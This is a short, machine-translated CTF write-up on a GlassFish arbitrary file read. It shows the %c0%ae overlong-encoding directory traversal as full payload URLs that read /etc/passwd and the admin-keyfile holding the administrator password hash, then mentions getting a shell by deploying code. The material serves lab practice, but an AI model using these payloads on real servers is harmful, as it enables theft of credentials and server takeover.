Buuctf [glassfish] arbitrary file reading

Vulnerability description

glassfish Is a java Write a cross platform open source application server .
java In language %c0%ae It can be interpreted as \uC0AE, The last escape is ASCCII Character .（ spot ）. utilize %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ To jump up , Directory traversal is reached 、 The effect of arbitrary file reading .

Loophole recurrence

visit https://node3.buuoj.cn:26836/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd, Found successfully read /etc/passwd Content

/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/domains/domain1/config/admin-keyfile

glassfish/domains/domain1/config/admin-keyfile It's storage admin Account and password file , Pictured above , We read this file , Get the password hash of the super administrator

The default password for this environment is vulhub_default_password

Direct deployment getshell